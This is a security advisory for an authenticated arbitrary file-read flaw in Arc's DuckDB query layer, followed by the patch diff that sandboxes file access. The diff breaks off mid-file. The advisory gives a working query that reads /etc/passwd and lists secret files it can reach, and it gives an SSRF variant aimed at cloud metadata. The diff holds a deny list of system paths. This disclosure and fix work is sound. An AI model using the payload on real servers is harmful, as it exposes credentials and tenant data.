VYPR
High severity7.1NVD Advisory· Published Jun 8, 2026· Updated Jun 8, 2026

Arc has an authenticated arbitrary local-file read via DuckDB I/O functions that bypasses RBAC table-level checks

CVE-2026-47735

Description

Summary

Arc's user-SQL validator (internal/api/query.go:ValidateSQLRequest) blocked only read_parquet( and arc_partition_agg( via regex denylist. The broader DuckDB I/O function family — read_csv_auto, read_csv, read_json, read_json_auto, read_text, read_blob, glob, parquet_metadata, parquet_schema, read_xlsx, etc. — was not blocked. RBAC table-reference extraction inspected only FROM/JOIN clauses, so scalar table functions in the SELECT list slipped past both layers.

Impact

Any authenticated user, including a token with permissions: [], can read arbitrary local files via:

POST /api/v1/query
Authorization: Bearer 
{"sql": "SELECT * FROM read_csv_auto('/etc/passwd', header=false, columns={'l':'VARCHAR'}) LIMIT 5"}

Confirmed reachable targets:

  • auth.db — bcrypt hashes for every API token, plus legacy SHA-256 rows.
  • arc.toml — S3 secrets, TLS keys.
  • /proc/self/environ — environment-variable secrets.
  • Cross-tenant Parquet files — bypasses RBAC because the tenant scope is enforced at the table layer, not on raw file paths.
  • SSRF when httpfs is loaded (any S3-backed deployment) — read_csv_auto('http://169.254.169.254/latest/meta-data/...') reaches instance metadata IPs.

Patches

Fixed in 2026.06.1 (PR #442) via a structural sandbox at the DuckDB layer:

  1. SET GLOBAL allowed_directories = [...] enumerates Arc's legitimate filesystem prefixes (storage roots + tier prefixes + import upload dir + compaction temp).
  2. SET GLOBAL enable_external_access = false (one-way at runtime).
  3. Verified by reading back the flag.

After lockdown, DuckDB refuses to open any file outside the allowlist and refuses further INSTALL/LOAD. Already-loaded extensions remain callable.

Workarounds

  • Restrict API access to known-trusted networks via firewall rules.
  • Temporary mitigation: add read_csv*/read_json*/glob etc. to dangerousSQLPattern in internal/api/query.go pending 2026.06.1.

Credits

Reported by Alex Manson (@NeuroWinter, https://neurowinter.com/) on 2026-05-19.

Affected products

1
  • Arc/Arcllm-fuzzy
    Range: <2026.06.1

Patches

1
91bdc29d1a02

fix(security): sandbox DuckDB user queries via enable_external_access=false + allowed_directories (#442)

https://github.com/Basekick-Labs/arcIgnacio Van DroogenbroeckMay 20, 2026via body-scan-shorthand
10 files changed · +1230 156
  • cmd/arc/main.go+308 21 modified
    @@ -11,7 +11,9 @@ import (
     	"os"
     	"path/filepath"
     	"runtime"
    +	"strings"
     	"time"
    +	"unicode"
     
     	"github.com/basekick-labs/arc/internal/api"
     	"github.com/basekick-labs/arc/internal/audit"
    @@ -43,6 +45,16 @@ import (
     // Version is set at build time
     var Version = "dev"
     
    +// uploadSubdirName is the fixed name of the multipart-upload directory Arc
    +// creates beneath cfg.Database.TempDirectory. cfg.Database.TempDirectory
    +// always resolves to a non-empty absolute path before this is used (the
    +// "./.tmp" fallback runs in main() before any consumer); the directory is
    +// NEVER created under os.TempDir, because os.TempDir is intentionally
    +// outside the DuckDB sandbox allowlist. MUST stay in sync with whatever
    +// path the DB layer adds to allowed_directories, otherwise reads of
    +// uploaded files fail with a permission error.
    +const uploadSubdirName = "arc-uploads"
    +
     func main() {
     	// Check for subcommands before loading full config
     	if len(os.Args) > 1 && os.Args[1] == "compact" {
    @@ -200,10 +212,32 @@ func main() {
     		S3Endpoint:  cfg.Storage.S3Endpoint,
     		S3UseSSL:    cfg.Storage.S3UseSSL,
     		S3PathStyle: cfg.Storage.S3PathStyle,
    +		S3Bucket:    cfg.Storage.S3Bucket,
    +		S3Prefix:    cfg.Storage.S3Prefix,
     		// Azure Blob Storage configuration for azure extension
     		AzureAccountName: cfg.Storage.AzureAccountName,
     		AzureAccountKey:  cfg.Storage.AzureAccountKey,
     		AzureEndpoint:    cfg.Storage.AzureEndpoint,
    +		AzureContainer:   cfg.Storage.AzureContainer,
    +		// Cold-tier sandbox allowlist entries. The cold tier may use a
    +		// different bucket/container from the primary backend (commonly
    +		// hot=local + cold=S3 on Enterprise); the sandbox must allow both.
    +		// Populated unconditionally — empty values are ignored by
    +		// buildAllowedDirectories. License gating happens later in main.go
    +		// before the tiering manager actually runs.
    +		ColdS3Bucket:       cfg.TieredStorage.Cold.S3Bucket,
    +		ColdS3Prefix:       cfg.TieredStorage.Cold.S3Prefix,
    +		ColdAzureContainer: cfg.TieredStorage.Cold.AzureContainer,
    +		// Local storage root used by the DuckDB sandbox to whitelist
    +		// Arc-managed file paths in allowed_directories. Always populated
    +		// regardless of the configured backend; on S3/Azure-only deployments
    +		// this still covers the local spill/temp areas under the same root.
    +		LocalStorageRoot: cfg.Storage.LocalPath,
    +		// Compaction temp directory (cfg.Compaction.TempDirectory) — every
    +		// compaction job COPYs rewritten parquet to a subdir of this path
    +		// before uploading. Must be in the sandbox allowlist or every
    +		// compaction job fails post-lockdown.
    +		CompactionTempDirectory: cfg.Compaction.TempDirectory,
     		// Query optimization
     		EnableS3Cache:     cfg.Query.EnableS3Cache,
     		S3CacheSize:       cfg.Query.S3CacheSize,
    @@ -220,21 +254,258 @@ func main() {
     		}(),
     	}
     
    -	// Resolve temp_directory to an absolute path so the value DuckDB stores
    -	// internally and the path the sweep walks are the same regardless of
    -	// the process CWD (matters for systemd units with WorkingDirectory=/
    -	// and for docker entrypoints rooted at /). Falls back to the
    -	// configured value if Abs fails. Normalize to forward slashes so the
    -	// path is safe to interpolate into a DuckDB SQL string on Windows
    -	// (backslashes would become escape sequences if standard_conforming_
    -	// strings is ever disabled) and so the SQL value matches the sweep
    -	// path byte-for-byte. Matches the pattern used by ArcxExtensionPath.
    -	if dbConfig.TempDirectory != "" {
    -		if abs, err := filepath.Abs(dbConfig.TempDirectory); err == nil {
    -			dbConfig.TempDirectory = abs
    +	// resolveAbsPath converts an operator-supplied path (possibly relative,
    +	// possibly Windows-slashed) into an absolute forward-slash form suitable
    +	// for safe interpolation into the DuckDB sandbox allowlist. Rejects paths
    +	// containing control bytes — they should not appear in real config and
    +	// would corrupt the allowlist SQL even after escapeSQLString quote-doubling
    +	// (newlines are SQL-significant; nulls truncate the literal in DuckDB's
    +	// parser). Empty input passes through unchanged so callers can treat
    +	// "unset" as a sentinel.
    +	//
    +	// Matters for systemd units with WorkingDirectory=/ and docker entrypoints
    +	// rooted at /, where relative paths resolve differently than during
    +	// operator-facing local runs. Also keeps the value DuckDB stores
    +	// internally byte-identical to what CleanupOrphanedSpillFiles walks.
    +	resolveAbsPath := func(name, p string) string {
    +		if p == "" {
    +			return p
    +		}
    +		// Reject any non-printable character or Unicode formatting / line/
    +		// paragraph separator. Real filesystem paths never contain these;
    +		// their presence in operator config indicates either a typo (newline
    +		// at end of YAML scalar, BOM at start of file) or a paste from a
    +		// hostile source. The categories caught:
    +		//   Cc — ASCII control (\0, \n, \r, \t, etc.)
    +		//   Cf — format chars (LRM/RLM/LRE/RLE/PDF/LRO/RLO/LRI/RLI/FSI/PDI,
    +		//        ZWSP/ZWNJ/ZWJ, BOM/ZWNBSP, soft hyphen — invisible runes
    +		//        that can make a path look one way in logs and another in
    +		//        the SQL literal sent to DuckDB).
    +		//   Zl — line separator (U+2028)
    +		//   Zp — paragraph separator (U+2029)
    +		// unicode.IsControl covers Cc; unicode.In with the others closes
    +		// the bidi / invisible-character bypass surface gemini will look
    +		// for. Reject loudly rather than try to interpret these.
    +		for _, r := range p {
    +			if unicode.IsControl(r) || unicode.In(r, unicode.Cf, unicode.Zl, unicode.Zp) {
    +				log.Fatal().Str("setting", name).Str("path", p).Msg("Configured path contains control, formatting, or line/paragraph-separator characters; refusing to start")
    +			}
    +		}
    +		// filepath.Abs can only fail when os.Getwd fails (e.g. the CWD was
    +		// unlinked between exec and now). Fail-fast — a silent relative-path
    +		// fallback would land in the sandbox allowlist as a relative literal
    +		// that never matches the absolute paths Arc emits at query time, and
    +		// the failure mode is invisible (every query 500s, no startup log).
    +		abs, err := filepath.Abs(p)
    +		if err != nil {
    +			log.Fatal().Err(err).Str("setting", name).Str("path", p).Msg("Failed to resolve path to absolute; refusing to start")
    +		}
    +		return filepath.ToSlash(abs)
    +	}
    +
    +	// Normalize every operator-supplied path that will be interpolated into
    +	// the DuckDB sandbox allowlist OR consumed by DuckDB directly. The
    +	// sandbox does prefix-match on literals — relative paths in the allowlist
    +	// never match the absolute paths Arc emits at query time, so every path
    +	// MUST be absolute before lockdown.
    +	//
    +	// If the operator explicitly cleared database.temp_directory, fall back
    +	// to a known relative path BEFORE Abs-resolving. Otherwise DuckDB's own
    +	// default (".tmp") would be relative and never match the absolute spill
    +	// paths inside the sandbox allowlist, breaking every query that spills.
    +	// Matches the config-load default at internal/config/config.go:757.
    +	if dbConfig.TempDirectory == "" {
    +		dbConfig.TempDirectory = "./.tmp"
    +	}
    +	dbConfig.TempDirectory = resolveAbsPath("database.temp_directory", dbConfig.TempDirectory)
    +	dbConfig.LocalStorageRoot = resolveAbsPath("storage.local_path", dbConfig.LocalStorageRoot)
    +	dbConfig.CompactionTempDirectory = resolveAbsPath("compaction.temp_directory", dbConfig.CompactionTempDirectory)
    +	if dbConfig.ArcxStorageRoot != "" {
    +		dbConfig.ArcxStorageRoot = resolveAbsPath("arcx.storage_root", dbConfig.ArcxStorageRoot)
    +	}
    +	// arcx.extension_path is interpolated into a `LOAD '<path>'` statement;
    +	// normalise it the same way every other operator-supplied path is
    +	// (control-char rejection + Abs + ToSlash) so the LOAD is robust against
    +	// CWD changes and so the path cannot smuggle SQL through escapeSQLString.
    +	if dbConfig.ArcxExtensionPath != "" {
    +		dbConfig.ArcxExtensionPath = resolveAbsPath("database.arcx_extension_path", dbConfig.ArcxExtensionPath)
    +	}
    +
    +	// Refuse obviously-wrong storage roots that would neuter the sandbox
    +	// (allowing every local file). Operator owns the config so this is
    +	// protection against a typo (e.g. "/" instead of "/data") rather than a
    +	// malicious config. Covers POSIX system roots, the OS temp tree (sharing
    +	// /tmp with other processes is never what an operator wants for Arc
    +	// data), and common shared-state roots. Windows roots like C:\ are not
    +	// enumerated — Windows-on-server-with-Arc is an unusual deployment.
    +	//
    +	// Apply to ALL local-directory configurations that end up in the sandbox
    +	// allowlist. TempDirectory and CompactionTempDirectory are also added
    +	// verbatim to allowed_directories, so a typo there would grant the same
    +	// kind of broad access as a misconfigured LocalStorageRoot.
    +	//
    +	// Prefix-match (not exact-match) so a configured path like
    +	// "/etc/arc-data" is rejected too — its allowlist entry would be
    +	// "/etc/arc-data/" which is still inside /etc and would let any reader
    +	// drop a file under /etc/arc-data to be exfiltrated through Arc. Same
    +	// reasoning for /root/.ssh, /proc/<pid>/, /sys/class/, etc.
    +	deniedRoots := []string{
    +		"/etc", "/usr", "/bin", "/sbin", "/boot",
    +		"/proc", "/sys", "/dev",
    +		"/root",
    +	}
    +	// pathStartsWithRoot returns true when `path` is exactly `root`, is
    +	// `root` with a trailing slash, or has `root + "/"` as a prefix.
    +	// Anchored so "/etcd-data" is NOT matched by "/etc" — only true
    +	// subdirectories or the bare directory itself.
    +	pathStartsWithRoot := func(path, root string) bool {
    +		return path == root || path == root+"/" || strings.HasPrefix(path, root+"/")
    +	}
    +	for _, pair := range []struct {
    +		name, value string
    +	}{
    +		{"storage.local_path", dbConfig.LocalStorageRoot},
    +		{"database.temp_directory", dbConfig.TempDirectory},
    +		{"compaction.temp_directory", dbConfig.CompactionTempDirectory},
    +	} {
    +		if pair.value == "" {
    +			continue
    +		}
    +		// Reject the root filesystem outright — never legitimate.
    +		if pair.value == "/" {
    +			log.Fatal().Str("setting", pair.name).Str("path", pair.value).Msg("Configured path refuses to be the filesystem root; pick a dedicated data directory")
    +		}
    +		for _, root := range deniedRoots {
    +			if pathStartsWithRoot(pair.value, root) {
    +				log.Fatal().Str("setting", pair.name).Str("path", pair.value).Str("denied_root", root).Msg("Configured path is inside a system root; pick a dedicated data directory")
    +			}
    +		}
    +	}
    +
    +	// Resolve symlinks on every local directory that lands in the sandbox
    +	// allowlist. filepath.Abs does NOT resolve symlinks; the kernel will,
    +	// so without EvalSymlinks the sandbox literal-string can mismatch the
    +	// real path the kernel opens (most common cause: macOS /var → /private/var,
    +	// Docker bind mounts, K8s subPath). Same Warn-and-substitute policy as
    +	// the upload-dir handling below — never hard-Fatal on a symlinked
    +	// ancestor; instead use the resolved path so the allowlist and the
    +	// kernel agree. EvalSymlinks errors only on missing paths, which is a
    +	// real misconfiguration we should fail on.
    +	resolveLocalDirSymlinks := func(name string, p *string) {
    +		if *p == "" {
    +			return
    +		}
    +		resolved, err := filepath.EvalSymlinks(*p)
    +		if err != nil {
    +			log.Fatal().Err(err).Str("setting", name).Str("path", *p).Msg("Failed to resolve configured path symlinks; refusing to start")
    +		}
    +		resolved = filepath.ToSlash(resolved)
    +		if resolved != *p {
    +			log.Warn().
    +				Str("setting", name).
    +				Str("original", *p).
    +				Str("resolved", resolved).
    +				Msg("Configured path resolves through a symlink; using the resolved path as the sandbox allowlist entry")
    +			*p = resolved
    +		}
    +	}
    +	// TempDirectory and CompactionTempDirectory must exist on disk before
    +	// EvalSymlinks is called — config-load defaults them to "./.tmp" and
    +	// "./data/compaction" respectively, neither of which exists at first
    +	// boot. Create them with 0o700 first so the symlink-resolution check
    +	// has something to resolve.
    +	if err := os.MkdirAll(dbConfig.TempDirectory, 0o700); err != nil {
    +		log.Fatal().Err(err).Str("path", dbConfig.TempDirectory).Msg("Failed to create database.temp_directory")
    +	}
    +	if dbConfig.CompactionTempDirectory != "" {
    +		if err := os.MkdirAll(dbConfig.CompactionTempDirectory, 0o700); err != nil {
    +			log.Fatal().Err(err).Str("path", dbConfig.CompactionTempDirectory).Msg("Failed to create compaction.temp_directory")
     		}
    -		dbConfig.TempDirectory = filepath.ToSlash(dbConfig.TempDirectory)
     	}
    +	if dbConfig.LocalStorageRoot != "" {
    +		if err := os.MkdirAll(dbConfig.LocalStorageRoot, 0o700); err != nil {
    +			log.Fatal().Err(err).Str("path", dbConfig.LocalStorageRoot).Msg("Failed to create storage.local_path")
    +		}
    +	}
    +	resolveLocalDirSymlinks("storage.local_path", &dbConfig.LocalStorageRoot)
    +	resolveLocalDirSymlinks("database.temp_directory", &dbConfig.TempDirectory)
    +	resolveLocalDirSymlinks("compaction.temp_directory", &dbConfig.CompactionTempDirectory)
    +
    +	// Production safety net: if every path contributing to the sandbox
    +	// allowlist is empty, DuckDB will refuse every file-touching query.
    +	// internal/database.lockdownExternalAccess logs a Warn in that case
    +	// (it's library code that test fixtures and embeddings also call), but
    +	// for the production binary an empty allowlist is unrecoverable
    +	// misconfiguration — fail-fast at startup rather than serving 500s on
    +	// every query. main.go's "./.tmp" fallback for TempDirectory makes this
    +	// branch effectively unreachable today; this guard is here to catch a
    +	// future refactor that drops the fallback.
    +	if dbConfig.LocalStorageRoot == "" &&
    +		dbConfig.TempDirectory == "" &&
    +		dbConfig.CompactionTempDirectory == "" &&
    +		dbConfig.S3Bucket == "" &&
    +		dbConfig.ColdS3Bucket == "" &&
    +		dbConfig.AzureContainer == "" &&
    +		dbConfig.ColdAzureContainer == "" {
    +		log.Fatal().Msg("sandbox allowlist would be empty — every file-touching query would fail; check arc.toml [storage] and [database] config")
    +	}
    +
    +	// Compute and create the import-upload directory. Lives under the
    +	// operator-configured TempDirectory (always non-empty by this point —
    +	// see the "./.tmp" fallback above). The DB sandbox whitelists exactly
    +	// this directory in allowed_directories so reads of uploaded files
    +	// succeed; nothing else under os.TempDir is reachable from user SQL.
    +	uploadDir := filepath.Join(dbConfig.TempDirectory, uploadSubdirName)
    +	if err := os.MkdirAll(uploadDir, 0o700); err != nil {
    +		log.Fatal().Err(err).Str("path", uploadDir).Msg("Failed to create import upload directory")
    +	}
    +	// Lstat BEFORE Chmod. os.Chmod follows symlinks (no portable Lchmod on
    +	// Linux), so a chmod-first ordering would silently change the perms of
    +	// any attacker-staged symlink target before the Lstat check fires. With
    +	// Lstat first, we abort startup the instant we see a symlink and the
    +	// target's perms remain untouched.
    +	if info, err := os.Lstat(uploadDir); err != nil {
    +		log.Fatal().Err(err).Str("path", uploadDir).Msg("Failed to stat import upload directory")
    +	} else if info.Mode()&os.ModeSymlink != 0 {
    +		log.Fatal().Str("path", uploadDir).Msg("Import upload directory is a symlink; refusing to start (security)")
    +	}
    +	// Defense in depth against an ancestor-of-uploadDir symlink (e.g.
    +	// dbConfig.TempDirectory itself is a symlink — filepath.Abs does not
    +	// resolve symlinks). If EvalSymlinks resolves to a different path, the
    +	// sandbox would otherwise allowlist the literal pre-resolution string
    +	// while the kernel actually opens files at the resolved location —
    +	// reads from the literal allowlisted path would fail, and writes via
    +	// the resolved path would land outside the allowlisted prefix.
    +	//
    +	// Hard-rejecting on any symlinked ancestor would break legitimate
    +	// deployments (macOS routes /var through /private/var; Docker bind
    +	// mounts and K8s subPath frequently traverse symlinks). Instead: log a
    +	// Warn so operators see the resolution happened, and use the resolved
    +	// path as the sandbox allowlist entry. The kernel and the allowlist
    +	// then agree on the same underlying directory, closing the spoofing
    +	// window without false-positiving common production environments.
    +	if resolved, err := filepath.EvalSymlinks(uploadDir); err != nil {
    +		log.Fatal().Err(err).Str("path", uploadDir).Msg("Failed to resolve import upload directory symlinks")
    +	} else if resolved != uploadDir {
    +		log.Warn().
    +			Str("original", uploadDir).
    +			Str("resolved", resolved).
    +			Msg("Import upload directory resolves through a symlink; using the resolved path as the sandbox allowlist entry")
    +		uploadDir = resolved
    +	}
    +	// Chmod after Lstat+EvalSymlinks — at this instant the path is a real
    +	// directory whose every ancestor resolves to itself. A same-host
    +	// attacker who can write to the parent directory still has a TOCTOU
    +	// window between EvalSymlinks and Chmod; that's a known constraint of
    +	// POSIX file APIs without O_PATH+fchmod, and an attacker with that
    +	// level of access has already won. MkdirAll silently accepts an
    +	// existing directory with looser permissions, so chmod explicitly to
    +	// enforce 0o700 across restarts. On Windows this is a no-op for the
    +	// perm bits but harmless.
    +	if err := os.Chmod(uploadDir, 0o700); err != nil {
    +		log.Fatal().Err(err).Str("path", uploadDir).Msg("Failed to chmod import upload directory to 0700")
    +	}
    +	dbConfig.UploadDir = filepath.ToSlash(uploadDir)
     
     	// Sweep orphaned DuckDB spill files from a previous run (kill -9,
     	// OOM-kill, crash). DuckDB unlinks these on graceful close, but
    @@ -716,11 +987,19 @@ func main() {
     		// Create compaction manager (discovers all databases dynamically)
     		// Compaction jobs run in subprocesses for memory isolation
     		compactionManager = compaction.NewManager(&compaction.ManagerConfig{
    -			StorageBackend:  storageBackend,
    -			LockManager:     lockManager,
    -			MaxConcurrent:   cfg.Compaction.MaxConcurrent,
    -			MemoryLimit:     cfg.Database.MemoryLimit, // Use same limit as main DuckDB
    -			CompletionDir:   completionDir,            // Phase 4: empty in OSS, set in cluster mode
    +			StorageBackend: storageBackend,
    +			LockManager:    lockManager,
    +			MaxConcurrent:  cfg.Compaction.MaxConcurrent,
    +			MemoryLimit:    cfg.Database.MemoryLimit, // Use same limit as main DuckDB
    +			CompletionDir:  completionDir,            // Phase 4: empty in OSS, set in cluster mode
    +			// Pass the SAME absolute-resolved value the DB-layer sandbox
    +			// allowlist references — dbConfig.CompactionTempDirectory has
    +			// already been through resolveAbsPath. Using the raw
    +			// cfg.Compaction.TempDirectory here would leave the manager
    +			// holding a relative path while the sandbox sees the absolute
    +			// resolution; the parent-side orphan-cleanup walker would then
    +			// look at a different filesystem location than the allowlist.
    +			TempDirectory:   dbConfig.CompactionTempDirectory,
     			SortKeysConfig:  sortKeysConfig,
     			DefaultSortKeys: defaultSortKeys,
     			Tiers:           tiers,
    @@ -1206,8 +1485,10 @@ func main() {
     	}
     	tleHandler.RegisterRoutes(server.GetApp())
     
    -	// Register Import handler (CSV, Parquet, Line Protocol, TLE bulk import)
    -	importHandler := api.NewImportHandler(db, storageBackend, logger.Get("import"))
    +	// Register Import handler (CSV, Parquet, Line Protocol, TLE bulk import).
    +	// uploadDir is the same path that database.New added to the DuckDB
    +	// sandbox's allowed_directories — staying in sync keeps imports working.
    +	importHandler := api.NewImportHandler(db, storageBackend, dbConfig.UploadDir, logger.Get("import"))
     	importHandler.SetArrowBuffer(arrowBuffer)
     	if authManager != nil && rbacManager != nil {
     		importHandler.SetAuthAndRBAC(authManager, rbacManager)
    @@ -1395,7 +1676,13 @@ func main() {
     	}
     
     	// Register Delete handler
    -	deleteHandler := api.NewDeleteHandler(db, storageBackend, &cfg.Delete, authManager, logger.Get("delete"))
    +	// DELETE on S3-backed deployments stages the rewritten parquet locally
    +	// before uploading; the temp file MUST land inside the DuckDB sandbox's
    +	// allowed_directories. Reuse the same dir as the import handler — it's
    +	// already allowlisted and lifecycle-managed (the file is unlinked after
    +	// upload). Cross-handler reuse is fine because the filenames are unique
    +	// via os.CreateTemp.
    +	deleteHandler := api.NewDeleteHandler(db, storageBackend, &cfg.Delete, authManager, dbConfig.UploadDir, logger.Get("delete"))
     	deleteHandler.RegisterRoutes(server.GetApp())
     	if clusterCoordinator != nil {
     		deleteHandler.SetCoordinator(clusterCoordinator)
    
  • internal/api/delete.go+41 8 modified
    @@ -93,7 +93,15 @@ type DeleteHandler struct {
     	config      *config.DeleteConfig
     	authManager *auth.AuthManager
     	coordinator DeleteCoordinator // nil in standalone mode
    -	logger      zerolog.Logger
    +	// tempDir is the absolute, sandbox-allowlisted directory used by
    +	// rewriteS3File to stage the COPY-rewritten parquet locally before
    +	// uploading. MUST match one of the prefixes added to DuckDB's
    +	// allowed_directories in cmd/arc/main.go, otherwise the COPY ... TO
    +	// fails with a permission error and DELETE on S3 backends silently
    +	// breaks. main.go passes the same path as the import handler's upload
    +	// dir; the two flows have identical sandbox requirements.
    +	tempDir string
    +	logger  zerolog.Logger
     }
     
     // DeleteRequest represents a delete operation request
    @@ -151,14 +159,23 @@ var dangerousPrefixPatterns = []string{
     	"sp_",
     }
     
    -// NewDeleteHandler creates a new delete handler
    -func NewDeleteHandler(db *database.DuckDB, storage storage.Backend, cfg *config.DeleteConfig, authManager *auth.AuthManager, logger zerolog.Logger) *DeleteHandler {
    +// NewDeleteHandler creates a new delete handler. tempDir MUST be the same
    +// path cmd/arc/main.go added to the DuckDB sandbox's allowed_directories,
    +// otherwise the COPY ... TO inside rewriteS3File fails on S3-backed
    +// deployments. Logs a Warn on empty tempDir so misconfigured deployments
    +// surface the issue at startup rather than at the first DELETE.
    +func NewDeleteHandler(db *database.DuckDB, storage storage.Backend, cfg *config.DeleteConfig, authManager *auth.AuthManager, tempDir string, logger zerolog.Logger) *DeleteHandler {
    +	componentLogger := logger.With().Str("component", "delete-handler").Logger()
    +	if tempDir == "" {
    +		componentLogger.Warn().Msg("NewDeleteHandler called with empty tempDir — DELETE on S3 backends will fail under the DuckDB sandbox; cmd/arc/main.go should pass the sandbox-allowlisted upload directory")
    +	}
     	return &DeleteHandler{
     		db:          db,
     		storage:     storage,
     		config:      cfg,
     		authManager: authManager,
    -		logger:      logger.With().Str("component", "delete-handler").Logger(),
    +		tempDir:     tempDir,
    +		logger:      componentLogger,
     	}
     }
     
    @@ -464,7 +481,6 @@ func (h *DeleteHandler) validateWhereClause(where string) (bool, error) {
     		return false, fmt.Errorf("WHERE clause contains forbidden keyword: %s", strings.ToUpper(match))
     	}
     
    -
     	// Check for dangerous prefixes
     	for _, pattern := range dangerousPrefixPatterns {
     		if strings.Contains(whereUpper, pattern) {
    @@ -782,15 +798,32 @@ type s3RewriteResult struct {
     // rewriteS3File handles file rewrite for S3 storage
     // DuckDB can read from S3 directly, then we write to a temp file and upload
     func (h *DeleteHandler) rewriteS3File(ctx context.Context, s3Path, relativePath, whereClause string, rowsBefore, rowsAfter int64) (int64, *s3RewriteResult, error) {
    +	// Fail-closed when the handler was constructed without a sandbox-
    +	// allowlisted tempDir. Without this guard, os.CreateTemp("", ...) would
    +	// fall back to os.TempDir() — outside the sandbox — and the subsequent
    +	// COPY ... TO would fail with a confusing DuckDB permission error. The
    +	// constructor Warn surfaces the misconfiguration at startup; this
    +	// fail-fast at request time provides a clearer signal in the response
    +	// body for the (rare) case where a constructor warning was missed.
    +	if h.tempDir == "" {
    +		return 0, nil, fmt.Errorf("delete handler is misconfigured: tempDir is empty; the DELETE-on-S3 staging directory must be allowlisted in the DuckDB sandbox (see cmd/arc/main.go uploadDir wiring)")
    +	}
     	db := h.db.DB()
     	deleted := rowsBefore - rowsAfter
     
    -	// Create temp file locally for the rewritten data
    -	tempFile, err := os.CreateTemp("", "arc-delete-*.parquet")
    +	// Create temp file locally for the rewritten data. The destination
    +	// directory MUST be inside DuckDB's allowed_directories — main.go
    +	// passes the same sandbox-allowlisted path as the import-upload dir.
    +	tempFile, err := os.CreateTemp(h.tempDir, "arc-delete-*.parquet")
     	if err != nil {
     		return 0, nil, fmt.Errorf("failed to create temp file: %w", err)
     	}
    -	tempPath := tempFile.Name()
    +	// ToSlash so Windows backslashes from os.CreateTemp match the
    +	// forward-slash sandbox allowlist entry (h.tempDir is already
    +	// normalized by main.go). The COPY ... TO statement below
    +	// interpolates tempPath verbatim into SQL, so a backslash form
    +	// would mismatch allowed_directories and the rewrite would fail.
    +	tempPath := filepath.ToSlash(tempFile.Name())
     	tempFile.Close()
     	defer os.Remove(tempPath)
     
    
  • internal/api/import.go+44 7 modified
    @@ -65,18 +65,37 @@ type ImportHandler struct {
     	authManager *auth.AuthManager
     	rbacManager RBACChecker
     
    +	// uploadDir is the directory under which multipart uploads land. Must
    +	// be one of the prefixes in the DuckDB sandbox's allowed_directories
    +	// list, otherwise read_csv/read_parquet on the uploaded file fails.
    +	// Empty means use the OS default (only safe before the sandbox lockdown
    +	// was introduced — kept for legacy/test paths that don't go through
    +	// main.go).
    +	uploadDir string
    +
     	// Stats
     	totalRequests atomic.Int64
     	totalRecords  atomic.Int64
     	totalErrors   atomic.Int64
     }
     
    -// NewImportHandler creates a new ImportHandler
    -func NewImportHandler(db *database.DuckDB, storage storage.Backend, logger zerolog.Logger) *ImportHandler {
    +// NewImportHandler creates a new ImportHandler. uploadDir must be the same
    +// path cmd/arc/main.go added to the DuckDB sandbox's allowed_directories,
    +// otherwise read_csv/read_parquet on the uploaded file fails post-lockdown.
    +// Logs a Warn on empty uploadDir; the request handler also fails-closed at
    +// every POST so misconfiguration surfaces both at startup and at the first
    +// import attempt. Tests that exercise the handler should pass a non-empty
    +// path (typically a t.TempDir() inside LocalStorageRoot).
    +func NewImportHandler(db *database.DuckDB, storage storage.Backend, uploadDir string, logger zerolog.Logger) *ImportHandler {
    +	componentLogger := logger.With().Str("component", "import-handler").Logger()
    +	if uploadDir == "" {
    +		componentLogger.Warn().Msg("NewImportHandler called with empty uploadDir — imports will fail under the DuckDB sandbox; cmd/arc/main.go should pass the sandbox-allowlisted upload directory")
    +	}
     	return &ImportHandler{
    -		db:      db,
    -		storage: storage,
    -		logger:  logger.With().Str("component", "import-handler").Logger(),
    +		db:        db,
    +		storage:   storage,
    +		uploadDir: uploadDir,
    +		logger:    componentLogger,
     	}
     }
     
    @@ -189,14 +208,32 @@ func (h *ImportHandler) handleFileImport(c *fiber.Ctx, format string, buildOpts
     		})
     	}
     
    -	// Save to temp file
    -	tempDir, err := os.MkdirTemp("", "arc-import-*")
    +	// Fail-closed when the handler was constructed without a sandbox-
    +	// allowlisted uploadDir. Without this guard, os.MkdirTemp("", ...) would
    +	// fall back to os.TempDir() — outside the DuckDB sandbox — and the
    +	// post-upload read_csv/read_parquet would fail with a confusing
    +	// permission error. The constructor Warn surfaces the misconfiguration
    +	// at startup; this fail-fast at request time provides a clearer signal.
    +	if h.uploadDir == "" {
    +		h.totalErrors.Add(1)
    +		return c.Status(fiber.StatusInternalServerError).JSON(fiber.Map{
    +			"error": "import handler is misconfigured: uploadDir is empty; the upload directory must be allowlisted in the DuckDB sandbox (see cmd/arc/main.go uploadDir wiring)",
    +		})
    +	}
    +	// Save to temp file inside the sandbox-allowlisted upload directory.
    +	tempDir, err := os.MkdirTemp(h.uploadDir, "arc-import-*")
     	if err != nil {
     		h.totalErrors.Add(1)
     		return c.Status(fiber.StatusInternalServerError).JSON(fiber.Map{
     			"error": "failed to create temp directory: " + err.Error(),
     		})
     	}
    +	// ToSlash so Windows backslashes from os.MkdirTemp match the
    +	// forward-slash sandbox allowlist entry (h.uploadDir is already
    +	// normalized by main.go). Without this, reads of the uploaded file
    +	// via read_csv/read_parquet would fail with a permission error on
    +	// Windows even though the upload landed inside the allowlisted prefix.
    +	tempDir = filepath.ToSlash(tempDir)
     	defer os.RemoveAll(tempDir)
     
     	tempFile := filepath.Join(tempDir, "import."+format)
    
  • internal/api/retention_test.go+11 7 modified
    @@ -30,11 +30,14 @@ func setupTestRetentionHandler(t *testing.T) (*RetentionHandler, string) {
     		t.Fatalf("failed to create LocalBackend: %v", err)
     	}
     
    -	// Create a DuckDB instance for tests
    +	// Create a DuckDB instance for tests. LocalStorageRoot is needed since
    +	// the sandbox active in New() restricts file reads/writes to allowlisted
    +	// directories — the test fixtures live under tmpDir.
     	duckdb, err := database.New(&database.Config{
    -		MemoryLimit:    "256MB",
    -		ThreadCount:    2,
    -		MaxConnections: 2,
    +		MemoryLimit:      "256MB",
    +		ThreadCount:      2,
    +		MaxConnections:   2,
    +		LocalStorageRoot: tmpDir,
     	}, logger)
     	if err != nil {
     		os.RemoveAll(tmpDir)
    @@ -89,9 +92,10 @@ func TestBuildParquetPath_S3Backend(t *testing.T) {
     	}
     
     	duckdb, err := database.New(&database.Config{
    -		MemoryLimit:    "256MB",
    -		ThreadCount:    2,
    -		MaxConnections: 2,
    +		MemoryLimit:      "256MB",
    +		ThreadCount:      2,
    +		MaxConnections:   2,
    +		LocalStorageRoot: tmpDir,
     	}, logger)
     	if err != nil {
     		t.Fatalf("failed to create DuckDB: %v", err)
    
  • internal/database/duckdb_arcx_test.go+12 12 modified
    @@ -36,14 +36,12 @@ func TestBuildDSN_ArcxEnabled(t *testing.T) {
